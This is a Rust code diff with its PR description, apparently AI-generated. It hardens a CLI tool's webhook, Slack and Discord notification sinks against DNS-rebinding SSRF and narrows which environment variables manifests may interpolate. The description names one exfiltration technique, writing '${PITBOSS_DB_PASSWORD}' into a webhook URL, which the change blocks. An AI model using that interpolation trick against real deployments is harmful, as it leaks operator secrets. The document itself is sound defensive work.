+        let env = NotificationEnvelope::new(
+            "run-x",
+            Severity::Info,
+            PitbossEvent::RunFinished {
+                run_id: "run-x".into(),
+                tasks_total: 0,
+                tasks_failed: 0,
+                duration_ms: 1,
+                spent_usd: 0.0,
+            },
+            Utc::now(),
+        );
+        router.dispatch(env).await.unwrap();
+
+        // The retry loop runs three attempts with 100/300ms backoffs ⇒
+        // ~1.3s total. Poll the counter so we don't depend on a fixed
+        // sleep.
+        let deadline = std::time::Instant::now() + std::time::Duration::from_secs(5);
+        loop {
+            if router.failed_emits_total() >= 1 {
+                break;
+            }
+            if std::time::Instant::now() >= deadline {
+                panic!("failed_emits_total never reached 1");
+            }
+            tokio::time::sleep(std::time::Duration::from_millis(50)).await;
+        }
+
+        let log_path = tmp.path().join("notifications.jsonl");
+        let body = tokio::fs::read_to_string(&log_path)
+            .await
+            .expect("notifications.jsonl must exist after emit failure");
+        assert!(body.contains("\"kind\":\"notification_failed\""), "{body}");
+        assert!(body.contains("\"sink_id\":\"test-fail\""), "{body}");
+        assert!(body.contains("\"event_kind\":\"run_finished\""), "{body}");
+        assert!(body.contains("synthetic emit failure"), "{body}");
+    }
+
+    /// #156 (L1) regression: env-var override of dedup cache size is
+    /// honored by `NotificationRouter::new`. We can't observe the cache
+    /// size directly, so we verify the constructor doesn't panic for an
+    /// extreme value (which a misuse of NonZeroUsize might).
+    #[test]
+    fn router_new_honors_dedup_cache_size_env() {
+        std::env::set_var(DEDUP_CACHE_SIZE_ENV, "1024");
+        let _ = NotificationRouter::new(vec![]);
+        std::env::set_var(DEDUP_CACHE_SIZE_ENV, "0"); // should fall back to default
+        let _ = NotificationRouter::new(vec![]);
+        std::env::set_var(DEDUP_CACHE_SIZE_ENV, "not a number");
+        let _ = NotificationRouter::new(vec![]);
+        std::env::remove_var(DEDUP_CACHE_SIZE_ENV);
     }
 }

--- a/crates/pitboss-cli/src/notify/parent.rs
+++ b/crates/pitboss-cli/src/notify/parent.rs
@@ -93,8 +93,29 @@ pub fn parent_run_id() -> Option<String> {
 /// that subprocess) inherits the value. `tokio::process::Command::envs()`
 /// adds keys without clearing the inherited env, so a single set here
 /// propagates through the whole spawn tree without per-site plumbing.
+///
+/// # Safety
+///
+/// `std::env::set_var` is `unsafe` in Rust edition 2024 (and warned in
+/// 2021 since 1.82) because mutating the process env is unsynchronised
+/// with concurrent reads from libc and other threads. Call only:
+///
+/// 1. From the dispatcher entry point, **before** any worker, MCP server,
+///    or notification task is spawned — there are no concurrent env
+///    readers at that point.
+/// 2. Exactly once per process. The value is never re-set after dispatch
+///    starts; nested `pitboss dispatch` invocations get a fresh process
+///    that re-runs this gate from a clean slate.
+///
+/// Both invariants are upheld by the single call site in the dispatcher
+/// runners. Nothing else in pitboss writes to the env after startup.
 pub fn set_run_id_env(run_id: &str) {
-    std::env::set_var(RUN_ID_ENV, run_id);
+    // SAFETY: see doc-comment above. The dispatcher calls this before any
+    // worker / MCP / notification task is spawned, so there are no
+    // concurrent env readers at this point.
+    unsafe {
+        std::env::set_var(RUN_ID_ENV, run_id);
+    }
 }
 
 /// Build a [`NotificationRouter`] combining manifest `[[notification]]`

--- a/crates/pitboss-cli/src/notify/sinks/discord.rs
+++ b/crates/pitboss-cli/src/notify/sinks/discord.rs
@@ -1,3 +1,6 @@
+#[cfg(test)]
+use crate::notify::config::resolve_request_timeout;
+use crate::notify::config::{build_pinned_client, pre_request_ssrf_check};
 use crate::notify::{NotificationEnvelope, NotificationSink, PitbossEvent, Severity};
 use anyhow::Result;
 use async_trait::async_trait;
@@ -10,11 +13,17 @@ pub struct DiscordSink {
     id: String,
     url: String,
     http: Arc<reqwest::Client>,
+    request_timeout: Duration,
     bypass_ssrf: bool,
 }
 
 impl DiscordSink {
-    pub fn new(idx: usize, url: String, http: Arc<reqwest::Client>) -> Self {
+    pub fn new(
+        idx: usize,
+        url: String,
+        http: Arc<reqwest::Client>,
+        request_timeout: Duration,
+    ) -> Self {
         let id = if idx == 0 {
             "discord".to_string()
         } else {
@@ -24,6 +33,7 @@ impl DiscordSink {
             id,
             url,
             http,
+            request_timeout,
             bypass_ssrf: false,
         }
     }
@@ -37,6 +47,7 @@ impl DiscordSink {
             id: "discord".to_string(),
             url,
             http,
+            request_timeout: resolve_request_timeout(None),
             bypass_ssrf: true,
         }
     }
@@ -187,23 +198,31 @@ impl NotificationSink for DiscordSink {
     }
 
     async fn emit(&self, env: &NotificationEnvelope) -> Result<()> {
-        if !self.bypass_ssrf {
-            crate::notify::config::pre_request_ssrf_check(&self.url).await?;
-        }
-
         let body = self.build_body(env);
         // Strip the URL from any reqwest error before it bubbles up — the
         // path carries the bot token (`/api/webhooks/<id>/<token>`) and
         // would otherwise land verbatim in tracing output. See
         // notify::config::redact_webhook_url for the formatted-string variant.
-        let response = self
-            .http
-            .post(&self.url)
-            .json(&body)
-            .timeout(Duration::from_secs(30))
-            .send()
-            .await
-            .map_err(|e| e.without_url())?;
+        let response = if self.bypass_ssrf {
+            self.http
+                .post(&self.url)
+                .json(&body)
+                .timeout(self.request_timeout)
+                .send()
+                .await
+                .map_err(|e| e.without_url())?
+        } else {
+            // DNS-rebinding-resistant path; see WebhookSink::emit for the
+            // identical pattern. Issue #156 (M2).
+            let preflight = pre_request_ssrf_check(&self.url).await?;
+            let client = build_pinned_client(&preflight, self.request_timeout)?;
+            client
+                .post(&self.url)
+                .json(&body)
+                .send()
+                .await
+                .map_err(|e| e.without_url())?
+        };
 
         match response.status() {
             status if status.is_success() => Ok(()),
@@ -246,6 +265,7 @@ mod tests {
             0,
             "https://example.com".into(),
             Arc::new(reqwest::Client::new()),
+            Duration::from_secs(30),
         );
         let env = NotificationEnvelope::new(
             "run-1",

--- a/crates/pitboss-cli/src/notify/sinks/mod.rs
+++ b/crates/pitboss-cli/src/notify/sinks/mod.rs
@@ -16,32 +16,41 @@ use std::sync::Arc;
 
 use anyhow::Result;
 
-use super::config::{NotificationConfig, SinkKind};
+use super::config::{resolve_request_timeout, NotificationConfig, SinkKind};
 use super::NotificationSink;
 
 /// Build a concrete sink from a config. Caller provides a shared
-/// reqwest::Client so HTTP sinks reuse connections.
+/// reqwest::Client; HTTP sinks use it on the SSRF-bypass path
+/// (`PITBOSS_PARENT_NOTIFY_URL`) and build a one-shot DNS-pinned client
+/// per emit on the manifest path — see [`super::config::build_pinned_client`].
+///
+/// Per-request timeout is taken from `cfg.request_timeout_secs` and falls
+/// back to [`super::config::DEFAULT_REQUEST_TIMEOUT_SECS`].
 pub fn build(
     cfg: &NotificationConfig,
     idx: usize,
     http: &Arc<reqwest::Client>,
 ) -> Result<Arc<dyn NotificationSink>> {
+    let timeout = resolve_request_timeout(cfg.request_timeout_secs);
     match cfg.kind {
         SinkKind::Log => Ok(Arc::new(LogSink::new(idx))),
         SinkKind::Webhook => Ok(Arc::new(WebhookSink::new(
             idx,
             cfg.url.clone().expect("validated earlier"),
             Arc::clone(http),
+            timeout,
         ))),
         SinkKind::Slack => Ok(Arc::new(SlackSink::new(
             idx,
             cfg.url.clone().expect("validated earlier"),
             Arc::clone(http),
+            timeout,
         ))),
         SinkKind::Discord => Ok(Arc::new(DiscordSink::new(
             idx,
             cfg.url.clone().expect("validated earlier"),
             Arc::clone(http),
+            timeout,
         ))),
     }
 }

--- a/crates/pitboss-cli/src/notify/sinks/slack.rs
+++ b/crates/pitboss-cli/src/notify/sinks/slack.rs
@@ -1,3 +1,6 @@
+#[cfg(test)]
+use crate::notify::config::resolve_request_timeout;
+use crate::notify::config::{build_pinned_client, pre_request_ssrf_check};
 use crate::notify::{NotificationEnvelope, NotificationSink, PitbossEvent, Severity};
 use anyhow::Result;
 use async_trait::async_trait;
@@ -10,11 +13,17 @@ pub struct SlackSink {
     id: String,
     url: String,
     http: Arc<reqwest::Client>,
+    request_timeout: Duration,
     bypass_ssrf: bool,
 }
 
 impl SlackSink {
-    pub fn new(idx: usize, url: String, http: Arc<reqwest::Client>) -> Self {
+    pub fn new(
+        idx: usize,
+        url: String,
+        http: Arc<reqwest::Client>,
+        request_timeout: Duration,
+    ) -> Self {
         let id = if idx == 0 {
             "slack".to_string()
         } else {
@@ -24,6 +33,7 @@ impl SlackSink {
             id,
             url,
             http,
+            request_timeout,
             bypass_ssrf: false,
         }
     }
@@ -37,6 +47,7 @@ impl SlackSink {
             id: "slack".to_string(),
             url,
             http,
+            request_timeout: resolve_request_timeout(None),
             bypass_ssrf: true,
         }
     }
@@ -192,24 +203,32 @@ impl NotificationSink for SlackSink {
     }
 
     async fn emit(&self, env: &NotificationEnvelope) -> Result<()> {
-        if !self.bypass_ssrf {
-            crate::notify::config::pre_request_ssrf_check(&self.url).await?;
-        }
-
         let body = self.build_body(env);
         // Strip the URL from any reqwest error before it bubbles up — the
         // path carries the incoming-webhook token
         // (`/services/T.../B.../<token>`) and would otherwise land verbatim
         // in tracing output. See notify::config::redact_webhook_url for the
         // formatted-string variant.
-        let response = self
-            .http
-            .post(&self.url)
-            .json(&body)
-            .timeout(Duration::from_secs(30))
-            .send()
-            .await
-            .map_err(|e| e.without_url())?;
+        let response = if self.bypass_ssrf {
+            self.http
+                .post(&self.url)
+                .json(&body)
+                .timeout(self.request_timeout)
+                .send()
+                .await
+                .map_err(|e| e.without_url())?
+        } else {
+            // DNS-rebinding-resistant path; identical pattern to
+            // WebhookSink::emit. Issue #156 (M2).
+            let preflight = pre_request_ssrf_check(&self.url).await?;
+            let client = build_pinned_client(&preflight, self.request_timeout)?;
+            client
+                .post(&self.url)
+                .json(&body)
+                .send()
+                .await
+                .map_err(|e| e.without_url())?
+        };
 
         match response.status() {
             status if status.is_success() => Ok(()),
@@ -263,6 +282,7 @@ mod tests {
             0,
             "https://example.com".into(),
             Arc::new(reqwest::Client::new()),
+            Duration::from_secs(30),
         );
         let env = NotificationEnvelope::new(
             "run-1",

--- a/crates/pitboss-cli/src/notify/sinks/webhook.rs
+++ b/crates/pitboss-cli/src/notify/sinks/webhook.rs
@@ -1,3 +1,4 @@
+use crate::notify::config::{build_pinned_client, pre_request_ssrf_check, resolve_request_timeout};
 use crate::notify::{NotificationEnvelope, NotificationSink};
 use anyhow::Result;
 use async_trait::async_trait;
@@ -8,7 +9,13 @@ use std::time::Duration;
 pub struct WebhookSink {
     id: String,
     url: String,
+    /// Shared client used only on the SSRF-bypass path
+    /// (`PITBOSS_PARENT_NOTIFY_URL`). The DNS-pinned path builds a fresh
+    /// client per emit so [`reqwest::ClientBuilder::resolve_to_addrs`] can
+    /// override DNS for the destination host — kept here to preserve the
+    /// connection pool for trusted sinks.
     http: Arc<reqwest::Client>,
+    request_timeout: Duration,
     /// Skip the per-request SSRF guard. Set only for sinks built from the
     /// `PITBOSS_PARENT_NOTIFY_URL` env var, since the canonical use case for
     /// that var is "POST to my local orchestrator on `http://localhost:N`"
@@ -19,7 +26,12 @@ pub struct WebhookSink {
 }
 
 impl WebhookSink {
-    pub fn new(idx: usize, url: String, http: Arc<reqwest::Client>) -> Self {
+    pub fn new(
+        idx: usize,
+        url: String,
+        http: Arc<reqwest::Client>,
+        request_timeout: Duration,
+    ) -> Self {
         let id = if idx == 0 {
             "webhook".to_string()
         } else {
@@ -29,18 +41,21 @@ impl WebhookSink {
             id,
             url,
             http,
+            request_timeout,
             bypass_ssrf: false,
         }
     }
 
     /// Like [`WebhookSink::new`] but tags the sink as operator-trusted so
     /// emit-time SSRF checks are skipped. Reserved for the
-    /// `PITBOSS_PARENT_NOTIFY_URL` ingest path.
+    /// `PITBOSS_PARENT_NOTIFY_URL` ingest path. Uses the
+    /// [`crate::notify::config::DEFAULT_REQUEST_TIMEOUT_SECS`] timeout.
     pub fn new_trusted(id: String, url: String, http: Arc<reqwest::Client>) -> Self {
         Self {
             id,
             url,
             http,
+            request_timeout: resolve_request_timeout(None),
             bypass_ssrf: true,
         }
     }
@@ -53,27 +68,35 @@ impl NotificationSink for WebhookSink {
     }
 
     async fn emit(&self, env: &NotificationEnvelope) -> Result<()> {
-        if !self.bypass_ssrf {
-            // DNS rebinding / mutable-CNAME SSRF guard: re-validate the URL's
-            // currently-resolved IP against the private-range blocklist
-            // before sending.
-            crate::notify::config::pre_request_ssrf_check(&self.url).await?;
-        }
-
         // `.without_url()` strips the request URL from the error chain
         // before it bubbles up: reqwest's Display impl includes the full
         // URL by default, which would leak Slack/Discord webhook tokens
         // (in path or query) into tracing output. See
         // notify::config::redact_webhook_url for the matching helper used
         // on string-formatted error messages.
-        let response = self
-            .http
-            .post(&self.url)
-            .json(env)
-            .timeout(Duration::from_secs(30))
-            .send()
-            .await
-            .map_err(|e| e.without_url())?;
+        let response = if self.bypass_ssrf {
+            self.http
+                .post(&self.url)
+                .json(env)
+                .timeout(self.request_timeout)
+                .send()
+                .await
+                .map_err(|e| e.without_url())?
+        } else {
+            // DNS-rebinding-resistant path: the SSRF check returns the exact
+            // SocketAddrs it validated, and we build a one-shot client whose
+            // DNS resolver is pinned to those addrs so reqwest's own internal
+            // lookup at send() time can't be steered to a private IP between
+            // the check and the POST. Issue #156 (M2).
+            let preflight = pre_request_ssrf_check(&self.url).await?;
+            let client = build_pinned_client(&preflight, self.request_timeout)?;
+            client
+                .post(&self.url)
+                .json(env)
+                .send()
+                .await
+                .map_err(|e| e.without_url())?
+        };
 
         match response.status() {
             status if status.is_success() => Ok(()),


### PR DESCRIPTION
## Summary

Drains the last open boxes on the **#155 Manifest** (1 item) and **#156 Notify** (6 items) audit trackers.

### Manifest #155 (final item)
- `map_doc::build_line_index` brace-depth scanner now **skips `//` and `///` lines**. Doc-comments containing `{` / `}` (e.g. a struct-literal example inside a `///` block) used to corrupt the depth counter and falsely close the surrounding struct body, attributing later fields to the wrong struct.
- Both auto-doc `--check` paths (CLI surface in `main::run_schema` *and* the in-process `checked_in_doc_matches_generator` tests in `map_doc.rs` + `example_doc.rs`) now **strip CR before LF** before comparing to the generator output. Contributors with `core.autocrlf=true` no longer false-positive every run.

### Notify #156 (6 items)
- **M2 (TOCTOU)** — `pre_request_ssrf_check` now returns the validated `SocketAddr` set instead of `Result<()>`. Each non-bypass HTTP sink builds a one-shot `reqwest::Client` with `resolve_to_addrs(host, ...)` pinning the destination to those exact IPs, closing the DNS-rebinding window between the guard's lookup and reqwest's own internal lookup at `send()`-time. The shared client is preserved for the trusted `PITBOSS_PARENT_NOTIFY_URL` path.
- **M3 (env-var prefix narrowing)** — `ENV_VAR_ALLOWED_PREFIX` shrinks from `PITBOSS_` → `PITBOSS_NOTIFY_`. A manifest can no longer write `\${PITBOSS_DB_PASSWORD}` into a webhook URL to exfiltrate any pitboss-internal env var (`PITBOSS_RUN_ID`, `PITBOSS_PARENT_NOTIFY_URL`, smoke-test fixtures, operator secrets). **Breaking** for manifests interpolating non-`PITBOSS_NOTIFY_` env vars into `[[notification]].url`.
- **M4 (failure metric + journal)** — terminal emit failures (after-retry exhaustion + fatal 4xx short-circuits) now bump a `failed_emits_total` `Arc<AtomicU64>` on `NotificationRouter` and append a `TaskEvent::NotificationFailed` JSONL line to `<run_subdir>/notifications.jsonl`. Both runners (`dispatch::runner::dispatch` flat + `dispatch::hierarchical::dispatch`) call `router.set_run_subdir(...)` right after creating the subdir.
- **L1 (dedup cache configurable)** — `NotificationRouter::new` honors `PITBOSS_NOTIFY_DEDUP_CACHE_SIZE` (parsed once; non-numeric or zero falls back to `DEFAULT_DEDUP_CACHE_SIZE = 64`). New explicit `new_with_capacity(sinks, capacity)` constructor for tests.
- **L5 (per-request timeout configurable)** — new optional `NotificationConfig.request_timeout_secs` field; defaults to `DEFAULT_REQUEST_TIMEOUT_SECS = 30`. Plumbed through `notify::sinks::build` to all three HTTP sinks. Previous behaviour was a hard-coded 30 s on the `RequestBuilder` invisible at the manifest surface.
- **L7 (set_run_id_env unsafe wrap)** — `std::env::set_var` is now in an `unsafe { ... }` block with a SAFETY comment documenting the dispatcher's single-call-site contract (called before any worker / MCP / notification task spawns, exactly once per process). Forward-compatible with edition 2024 where `set_var` becomes `unsafe`.

## Test plan

- [x] `cargo test --workspace` — all green (522 lib + integration; +6 new tests across `notify::config` and `notify::tests`)
- [x] `cargo clippy --workspace --all-targets --no-deps -- -D warnings` — clean
- [x] `cargo fmt --all -- --check` — clean
- [x] `cargo run -p pitboss-cli -- schema --format=map / --format=example` — both checked-in docs match (no drift)
- [x] New `router_records_failed_emit_metric_and_journal_line` exercises the M4 path end-to-end with a synthetic always-failing sink and tempdir
- [x] New `pre_request_ssrf_check_returns_literal_ip_variant_for_ip_url` + `build_pinned_client_*` cover the M2 contract
- [x] Existing `webhook_*` / `discord_sink_*` / `slack_sink_*` mock-server tests pass through the new `Duration` constructor parameter unchanged

## What's NOT in this PR

The two trackers (#155, #156) had every remaining audit box checked by this work — both can be closed when this lands. No follow-up shape is left.

Closes #155, closes #156.

🤖 Generated with [Claude Code](https://claude.com/claude-code)